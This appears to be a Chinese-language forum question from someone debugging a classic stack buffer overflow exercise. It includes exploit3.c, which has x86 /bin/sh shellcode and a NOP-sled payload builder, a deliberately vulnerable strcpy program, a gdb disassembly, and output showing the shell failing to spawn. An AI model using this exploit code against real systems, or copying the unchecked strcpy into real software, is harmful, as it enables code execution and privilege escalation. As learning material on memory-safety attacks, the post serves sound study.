我想使用C Shell代码使缓冲区溢出并执行bin / sh

我试图使缓冲区溢出并运行shellcode以执行bin / sh

对于我们的缓冲区大小，一个好的选择比我们尝试溢出的缓冲区大小大约多100个字节。这会将我们的代码放置在我们尝试溢出的缓冲区的末尾，为NOP留出了很多空间，但是仍然用我们猜测的地址覆盖了返回地址。我们尝试溢出的缓冲区长512个字节，因此我们将使用612。

exploit3.c

#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 

#define DEFAULT_OFFSET                    0 
#define DEFAULT_BUFFER_SIZE             512 
#define NOP                            0x90 
char shellcode[] =  
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"  
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"  
            "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 

unsigned long get_sp(void) {   
    __asm__("movl %esp,%eax"); 

} 
void main(int argc, char *argv[]) {  
    char *buff, *ptr;  
    long *addr_ptr, addr;  
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;  
    int i; 
    if (argc > 1) 
        bsize  = atoi(argv[1]);  
    if (argc > 2) 
        offset = atoi(argv[2]);  
    if (!(buff = malloc(bsize))) {    
        printf("Can't allocate memory.\n");   
        exit(0);  
    }  
    addr = get_sp() - offset;  
    printf("Using address: 0x%lx\n", addr);  
    ptr = buff;  
    addr_ptr = (long *) ptr;  
    for (i = 0; i < bsize; i+=4)    
    *(addr_ptr++) = addr;  
    for (i = 0; i < bsize/2; i++)    
    buff[i] = NOP;  
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));  
    for (i = 0; i < strlen(shellcode); i++)    
        *(ptr++) = shellcode[i];  

    buff[bsize - 1] = '\0';  
    memcpy(buff,"EGG=",4);  
    putenv(buff);  system("/bin/bash"); 
}


vulnerable.c

#include <unistd.h>
#include <string.h>


int main(int argc, char *argv[])

{

char xbuff[512];



if(argc >1)

strcpy(xbuff, argv[1]);

return 0;

}

函数主的汇编代码

(gdb) disass main
Dump of assembler code for function main:
   0x0804840b <+0>: lea    0x4(%esp),%ecx
   0x0804840f <+4>: and    $0xfffffff0,%esp
   0x08048412 <+7>: pushl  -0x4(%ecx)
   0x08048415 <+10>:    push   %ebp
   0x08048416 <+11>:    mov    %esp,%ebp
   0x08048418 <+13>:    push   %ecx
   0x08048419 <+14>:    sub    $0x204,%esp
   0x0804841f <+20>:    mov    %ecx,%eax
   0x08048421 <+22>:    cmpl   $0x1,(%eax)
   0x08048424 <+25>:    jle    0x8048441 <main+54>
   0x08048426 <+27>:    mov    0x4(%eax),%eax
   0x08048429 <+30>:    add    $0x4,%eax
   0x0804842c <+33>:    mov    (%eax),%eax
   0x0804842e <+35>:    sub    $0x8,%esp
   0x08048431 <+38>:    push   %eax
   0x08048432 <+39>:    lea    -0x208(%ebp),%eax
   0x08048438 <+45>:    push   %eax
   0x08048439 <+46>:    call   0x80482e0 <strcpy@plt>
   0x0804843e <+51>:    add    $0x10,%esp
   0x08048441 <+54>:    mov    $0x0,%eax
   0x08048446 <+59>:    mov    -0x4(%ebp),%ecx
   0x08048449 <+62>:    leave  
   0x0804844a <+63>:    lea    -0x4(%ecx),%esp
   0x0804844d <+66>:    ret    
End of assembler dump.


程序已执行，但未调用bin / sh：

[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$

预期输出是：

[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$ exit
[aleph1]$

有什么问题吗？！

第二个问题

...